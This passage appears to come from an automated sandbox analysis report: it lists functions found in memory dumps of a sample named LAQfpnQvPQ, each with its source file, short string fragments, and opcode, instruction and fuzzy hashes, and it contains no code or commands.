                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq$,aq
                                                                          • API String ID: 0-1929014441
                                                                          • Opcode ID: 2e4d561b5218b990fabcbfdbd657620e70042878d27c72390e81cb3d834025f4
                                                                          • Instruction ID: 6273bc69223023f390f75a012dc3ed80c7071a71e5211354d3ac8380b7e791f7
                                                                          • Opcode Fuzzy Hash: 2e4d561b5218b990fabcbfdbd657620e70042878d27c72390e81cb3d834025f4
                                                                          • Instruction Fuzzy Hash: 21D13DB4A00109CFCB14DF69C584AAAB7F2FF89351F69C5A9E9059B361CB74EC41CB90
                                                                          Function 07590DCA Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244369902.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7590000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q$4']q
                                                                          • API String ID: 0-3120983240
                                                                          • Opcode ID: 3eac9e7abbaa16696bc15657c88a28884424eb0b71a45a3be30e8c868b63c3cf
                                                                          • Instruction ID: 7287192be152b82ad7b306738540733ef61db3375448998df9ffe93a2254d4b3
                                                                          • Opcode Fuzzy Hash: 3eac9e7abbaa16696bc15657c88a28884424eb0b71a45a3be30e8c868b63c3cf
                                                                          • Instruction Fuzzy Hash: 9671FAB0A11609CFE748DF6BE94569ABFF6FFC8200F14D52AD01897265DB389846CF50
                                                                          Function 07590DD8 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244369902.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7590000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q$4']q
                                                                          • API String ID: 0-3120983240
                                                                          • Opcode ID: 21a545f91a82730473b40f1c2341eb50cb2d66179628a730a4f17e2982d2b240
                                                                          • Instruction ID: 4e96c24acce6d52f3fb85399e6d823d7619035dc4008bb30099dcac1226e6089
                                                                          • Opcode Fuzzy Hash: 21a545f91a82730473b40f1c2341eb50cb2d66179628a730a4f17e2982d2b240
                                                                          • Instruction Fuzzy Hash: F971DAB0A11609CFE748DF6BE94569ABFF2FFC8200F14D52AD01897265DB789846CF50
                                                                          Function 076232E8 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: )ce
                                                                          • API String ID: 0-3229236079
                                                                          • Opcode ID: c56de65005176ad6ce58b2c655ec2df7076acfa7236f428450f59d1226e2a857
                                                                          • Instruction ID: cdf61ede26b4a3a42b347df2389cf9638d0da70c22e68bfba6017d95a6cc3c78
                                                                          • Opcode Fuzzy Hash: c56de65005176ad6ce58b2c655ec2df7076acfa7236f428450f59d1226e2a857
                                                                          • Instruction Fuzzy Hash: F612A4B1E006198FDB54CFAAC98069DFBF2BF88304F24C169D459AB31AD734A946CF54
                                                                          Function 069FF858 Relevance: 1.5, Strings: 1, Instructions: 294COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: wJ??
                                                                          • API String ID: 0-1142507566
                                                                          • Opcode ID: e66003b333f8e85a7323a29d176d92a0851a051912c7c213534afb09ebccf26d
                                                                          • Instruction ID: dcecbe0e1f0fb440384a9c7a793430dfb075c529ebe85e255fca9bcfddaeb2f8
                                                                          • Opcode Fuzzy Hash: e66003b333f8e85a7323a29d176d92a0851a051912c7c213534afb09ebccf26d
                                                                          • Instruction Fuzzy Hash: B9C13670A15218CFEB94DFAAD484BADBBF1FB49304F50906AD50AA7394DB389C85CF50
                                                                          Function 069FF868 Relevance: 1.5, Strings: 1, Instructions: 293COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: wJ??
                                                                          • API String ID: 0-1142507566
                                                                          • Opcode ID: 1a3b871cbc00aacde26cd518fcf194af9fd046c694ffc01ab4526326adde0145
                                                                          • Instruction ID: 66f55fcb64bbed8554ba369870da9ce3cfd275bb5ac958fdd09e5ec5b1147ec5
                                                                          • Opcode Fuzzy Hash: 1a3b871cbc00aacde26cd518fcf194af9fd046c694ffc01ab4526326adde0145
                                                                          • Instruction Fuzzy Hash: CDC12570E15218CFEB94DFAAD484BADBBF1FB49304F50906AD50AA7294DB389C85CF50
                                                                          Function 0762D620 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: 463811ca26773c38cb6baafc1e373f468507976961f139f9fc5295aa332d66ad
                                                                          • Instruction ID: 70283dcf88330163b9a5c0530df7847019cc609c6ae402f2edee8648d3115a89
                                                                          • Opcode Fuzzy Hash: 463811ca26773c38cb6baafc1e373f468507976961f139f9fc5295aa332d66ad
                                                                          • Instruction Fuzzy Hash: 27B1F6B0E05619CFDB94DFA9C584B9DBBF2BB89300F109069D40AA7345DB749D86DF40
                                                                          Function 0762D610 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: 70764d174dd7cfe4632e73035a515f95b7236cda0fa7551451b2a2f7b726da44
                                                                          • Instruction ID: 8b096787e741012f619c86aceb31eb664f648cc0541b8e1c48c58dbcf33b3102
                                                                          • Opcode Fuzzy Hash: 70764d174dd7cfe4632e73035a515f95b7236cda0fa7551451b2a2f7b726da44
                                                                          • Instruction Fuzzy Hash: CDB105B4E05618CFDB94DFA9C984B9DBBF2BB89300F1090A9D40AA7345DB749D86DF40
                                                                          Function 069F3B38 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: daq
                                                                          • API String ID: 0-1532007458
                                                                          • Opcode ID: 8dc15f15b29cd885316d22ab4fb34bd77affabeb20c3377a6161a8e93ae6958c
                                                                          • Instruction ID: 55d76dbc9e38bc32f3c226f3722cabff67c675af385cce4b36007bdec30d1e91
                                                                          • Opcode Fuzzy Hash: 8dc15f15b29cd885316d22ab4fb34bd77affabeb20c3377a6161a8e93ae6958c
                                                                          • Instruction Fuzzy Hash: 2C719A70D16208CFEB54EFA9D5447ADBBB2FB89300F20816AD509A3350DB389D85CF80
                                                                          Function 069F3B48 Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: daq
                                                                          • API String ID: 0-1532007458
                                                                          • Opcode ID: 715b608f096768cae6ed89b2e346bf0e10cca952140966a78abbbe26416e76fa
                                                                          • Instruction ID: 34d0b81a1cda499666099574db5893061a8720541b747cb53ea6bf2ed3c99f54
                                                                          • Opcode Fuzzy Hash: 715b608f096768cae6ed89b2e346bf0e10cca952140966a78abbbe26416e76fa
                                                                          • Instruction Fuzzy Hash: 97718A70D16208CFEB54EFA9D5447ADBBB2FB89300F20856AD509A3350DB389D85CF80
                                                                          Function 075DC9F8 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244533453.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75d0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: c
                                                                          • API String ID: 0-112844655
                                                                          • Opcode ID: 0728ba3c49438907dbd79c6de38a96c7cab399c9a90300d5178cbf8979cd4841
                                                                          • Instruction ID: b83333e320ccb521e19347718c587273cb1d3ca3ee2bcc6bd590b3275dfbe801
                                                                          • Opcode Fuzzy Hash: 0728ba3c49438907dbd79c6de38a96c7cab399c9a90300d5178cbf8979cd4841
                                                                          • Instruction Fuzzy Hash: FD31BDB1E156298BDB2DCF5BCC4069AFAFBBFC9200F04D5BA951CA6254DB700A858F10
                                                                          Function 07AA0036 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2246049585.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7aa0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: U
                                                                          • API String ID: 0-3372436214
                                                                          • Opcode ID: 2a60bf464c8bbd3346e10d0c47dcddbd183126d7318d1b386d580f64cd72f9aa
                                                                          • Instruction ID: e1a716260dec94c4bd865f9138783e839ce7e3dc984979e7f0d40e408c7a6152
                                                                          • Opcode Fuzzy Hash: 2a60bf464c8bbd3346e10d0c47dcddbd183126d7318d1b386d580f64cd72f9aa
                                                                          • Instruction Fuzzy Hash: A821FBB1D046598BEB28CF2BDD443DABAF3AFC4300F04C0FAD51866654EB740A858F41
                                                                          Function 017EF3B8 Relevance: .3, Instructions: 315COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2219026524.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_17e0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7aab1b6ab2cb59cf42656159f9cb656bd70e079a5a41b53b2e5d5493693f2bf5
                                                                          • Instruction ID: 142f113f5c90612f2cae5f43d415c566bc369fad28d8143c7be9239f41590a57
                                                                          • Opcode Fuzzy Hash: 7aab1b6ab2cb59cf42656159f9cb656bd70e079a5a41b53b2e5d5493693f2bf5
                                                                          • Instruction Fuzzy Hash: DA12A7F84017458BD318EF65ED4C1893BB7BB8A328F508219D2652F2E9DBB415CACF64
                                                                          Function 077F30C3 Relevance: .3, Instructions: 276COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 79e89963458535c510d0a14c7f2620d994ca8bb7bbe6fcb3e9b4fc4a1a920983
                                                                          • Instruction ID: b5197c868653476f0ac10b87ca2c0eb9973ec9ed8131560e94ab05b910424b66
                                                                          • Opcode Fuzzy Hash: 79e89963458535c510d0a14c7f2620d994ca8bb7bbe6fcb3e9b4fc4a1a920983
                                                                          • Instruction Fuzzy Hash: 3BC101B4E05618CFEB14DFA9DA84BADBBF2FB89300F10816AD509A7354DB359985CF01
                                                                          Function 077F30D0 Relevance: .3, Instructions: 275COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 51b4dbd6d810b2f0a47635596314791858204c7ae6c3d00166e3449bf5cdf6be
                                                                          • Instruction ID: 20489a8ed4fb27171fd91f007d98eb5d906881277054e8702a20e3f11abe6725
                                                                          • Opcode Fuzzy Hash: 51b4dbd6d810b2f0a47635596314791858204c7ae6c3d00166e3449bf5cdf6be
                                                                          • Instruction Fuzzy Hash: D2C102B4E05618CFDB14DFA9DA84BADBBF2FB8A300F10916AD509A7354DB359985CF00
                                                                          Function 017ECB14 Relevance: .3, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2219026524.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_17e0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f09f0bb37f758541953ee27e9e753a8d361ad5a4dba78983419a6b075496c2c7
                                                                          • Instruction ID: a3c0da57599c31d8c264ea4be0f295a359763d3fc35f30ac8a98df66bfbaf5e5
                                                                          • Opcode Fuzzy Hash: f09f0bb37f758541953ee27e9e753a8d361ad5a4dba78983419a6b075496c2c7
                                                                          • Instruction Fuzzy Hash: 66A14E36E002198FCF05DFB8C94859EBBF2FF89300B15856AE906AB265DF31E955CB50
                                                                          Function 017EF3A8 Relevance: .2, Instructions: 221COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2219026524.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_17e0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2be445a6746b0ad02cde1eaa993eafadcf348c307536ab637a1fb7bdcc4c5609
                                                                          • Instruction ID: c93453b4a99232092764a358a4664fbf55ffca2a8bb0813402245c8223871147
                                                                          • Opcode Fuzzy Hash: 2be445a6746b0ad02cde1eaa993eafadcf348c307536ab637a1fb7bdcc4c5609
                                                                          • Instruction Fuzzy Hash: 7FC119B84007468BD718EF65EC4C1897BB6FF8A328F508319D1616B2E8DBB414CACF64
                                                                          Function 07591308 Relevance: .2, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244369902.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7590000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 71cf5cf2db26b8f3d2854b020048c69d023143878d50797aa797879b6b53f6a9
                                                                          • Instruction ID: 966b64ae1a4cafdbe99858de66c180fb1481216768bb5307c5d82616c8f04b0c
                                                                          • Opcode Fuzzy Hash: 71cf5cf2db26b8f3d2854b020048c69d023143878d50797aa797879b6b53f6a9
                                                                          • Instruction Fuzzy Hash: 68717BB1D056688BEB29CF2B8D447D9FAF7AFC9300F04C1EA984DA6254DB700AC58E11
                                                                          Function 069F4260 Relevance: .1, Instructions: 139COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9c7920ba8ee4284a421e6b9a26d07ca1cc7334c5dbe632fc827dcc6ffb661293
                                                                          • Instruction ID: 52c0efe8968de3679ee0e693416a3c77c671771ca26ef9317dc16f37e683248a
                                                                          • Opcode Fuzzy Hash: 9c7920ba8ee4284a421e6b9a26d07ca1cc7334c5dbe632fc827dcc6ffb661293
                                                                          • Instruction Fuzzy Hash: 85519870D16208CFEB50DF99E1847EEBBF2EB49704F219029D518A7651C7B89C86CF80
                                                                          Function 069F4270 Relevance: .1, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 96d6ce83d6716e7d0025c891552fbf59d1231072b9742dc5f9fcc74f93fea173
                                                                          • Instruction ID: b9ee1aabc647a93b91fdb70f621912573f333b1d5b45ab83bb520159021b7e56
                                                                          • Opcode Fuzzy Hash: 96d6ce83d6716e7d0025c891552fbf59d1231072b9742dc5f9fcc74f93fea173
                                                                          • Instruction Fuzzy Hash: F2519870D16208CFEB40DF99E184BEEBBF6EB49704F219029D119A7651C7789C86CF80
                                                                          Function 077FD9B8 Relevance: .1, Instructions: 131COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a6c33959d7b9c996d4e03062cce73dbc4cea9c5c680f7b32767d645d4de51ef5
                                                                          • Instruction ID: 026754d469f8e568b22b7eebb385b7d4f4d743ab315c682234cfb44811608f4d
                                                                          • Opcode Fuzzy Hash: a6c33959d7b9c996d4e03062cce73dbc4cea9c5c680f7b32767d645d4de51ef5
                                                                          • Instruction Fuzzy Hash: 8B51E6B0E05219CBEB64CFAAC954BEDBBB2BF89300F1085AAC509A7350DB745D85CF50
                                                                          Function 076232D8 Relevance: .1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6b61c1d86f5eacd77bfc99d12ea2e3b2804dd58d55a41e73b5bfe89abed72351
                                                                          • Instruction ID: fc76c05d1a19337712a6143ad85ac35e71f9edcfaafaf234f84702f149b75b40
                                                                          • Opcode Fuzzy Hash: 6b61c1d86f5eacd77bfc99d12ea2e3b2804dd58d55a41e73b5bfe89abed72351
                                                                          • Instruction Fuzzy Hash: 5A4155B5E016599BDB08CFABC94059EFBF3BFC8210F14C07AD958AB224EB3459468F54
                                                                          Function 077FD9A7 Relevance: .1, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 730d627977dfba096405e0005199166efb197beaad07f9d416aeb1e99d4704d0
                                                                          • Instruction ID: f7ef6191ddc51269b5a53673ed0e72935f293bf5579a486ec86df04963613467
                                                                          • Opcode Fuzzy Hash: 730d627977dfba096405e0005199166efb197beaad07f9d416aeb1e99d4704d0
                                                                          • Instruction Fuzzy Hash: C65109B1E05219CFEB64CFAAC9547EDBBB2AF89300F1085AAC509A7350DB745D81CF50
                                                                          Function 0759135E Relevance: .1, Instructions: 109COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244369902.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7590000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f42ca46dce821b8f1c5600fcba5ddfaf05618ccd602c8ff5faadcf772020e29d
                                                                          • Instruction ID: b5140e910594e2d6adfc5f5ee65c2710f18dedc83bc5767d2d33edf56ca090ef
                                                                          • Opcode Fuzzy Hash: f42ca46dce821b8f1c5600fcba5ddfaf05618ccd602c8ff5faadcf772020e29d
                                                                          • Instruction Fuzzy Hash: DD510071D05A588BEB6CCF2B9D456CAFAF3AFC9300F14C1FA954CA6254DB700AC58E51
                                                                          Function 075D10C8 Relevance: .1, Instructions: 76COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244533453.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75d0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dd3a231e8d52449836704848811bf4fcf2072be3bb2b34e7566a07fb78b8f6f8
                                                                          • Instruction ID: 21a7ed6e15018a4c347b313792460790a1675297c36b7a095b0cdc7203b1be3e
                                                                          • Opcode Fuzzy Hash: dd3a231e8d52449836704848811bf4fcf2072be3bb2b34e7566a07fb78b8f6f8
                                                                          • Instruction Fuzzy Hash: 733195B1D05618CBEB68CF6BC949789FBF6BFC9304F14C1A9C40CA6254DB750A898F51
                                                                          Function 075DC9EA Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244533453.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75d0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8baafe38f4409c9458175866eeb126459c1c34201bba9a4df0ae62acf6fa9cff
                                                                          • Instruction ID: 80af6bfd89410e107c59b65cfb24ca333aadd61c6ec27f9e940256745eca98ae
                                                                          • Opcode Fuzzy Hash: 8baafe38f4409c9458175866eeb126459c1c34201bba9a4df0ae62acf6fa9cff
                                                                          • Instruction Fuzzy Hash: B731E1B1E116598BEB1DCF6B8C4069AFAFBBFC5200F04D1FA9418A6254DB700A818F50
                                                                          Function 07AA0040 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2246049585.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7aa0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2f4b2fcbb2855077d47f2cfd67462662c3c2bf2049b451184de407c2a02054ad
                                                                          • Instruction ID: 5b597c8e6597dfd4a2d8dfee63958db9e9c1bf54b0c18e57b943aeacc4bdefc2
                                                                          • Opcode Fuzzy Hash: 2f4b2fcbb2855077d47f2cfd67462662c3c2bf2049b451184de407c2a02054ad
                                                                          • Instruction Fuzzy Hash: 8631EAB1D056298BEB28CF2BD9447DAFAF6AFC9300F04C0FAD41D66254EB741A858F41
                                                                          Function 075D10B8 Relevance: .1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244533453.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75d0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 130185cae308f450a421aefe32c2f2a5a903e46ec709879eec604330163cdd2e
                                                                          • Instruction ID: 70b36d35868a3b7c86901659f4577caa5e47778cd0ead4361c7d47cfffeecfd8
                                                                          • Opcode Fuzzy Hash: 130185cae308f450a421aefe32c2f2a5a903e46ec709879eec604330163cdd2e
                                                                          • Instruction Fuzzy Hash: 7431CCB1D016188BEB68CF5BD8457DAFBF7AFC4304F14C0AAC40CAA254DB750A858F41
                                                                          Function 069F7A28 Relevance: .1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4bc1ee15c60b20d61974606d5175014b080b4f4c0ca31847b35ee0a5e0af3a54
                                                                          • Instruction ID: 70462584d859fed3bcb14430174562eede4bb61e18c65f05dc4fa7dfb7537ef7
                                                                          • Opcode Fuzzy Hash: 4bc1ee15c60b20d61974606d5175014b080b4f4c0ca31847b35ee0a5e0af3a54
                                                                          • Instruction Fuzzy Hash: 2121E2B1E146188BEB58CF9BD9447DEFBF7AFC8310F15C0AAD508AA254DB744A458F40
                                                                          Function 069F7A23 Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5af5deb9e49c0007606e7c1cea22cb62520eea465ca1dd7a77f36a36e88e052f
                                                                          • Instruction ID: 84181fa621e804fbfc0f78b6923414e3caa0aa2aa6d7d7e410f069fb86a55aa4
                                                                          • Opcode Fuzzy Hash: 5af5deb9e49c0007606e7c1cea22cb62520eea465ca1dd7a77f36a36e88e052f
                                                                          • Instruction Fuzzy Hash: A521E7B1E14618CBEB18CF9BD9443DEFAF7AFC8300F15C16AD408AA254DB744A468F40
                                                                          Function 077573A8 Relevance: 7.7, Strings: 6, Instructions: 154COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
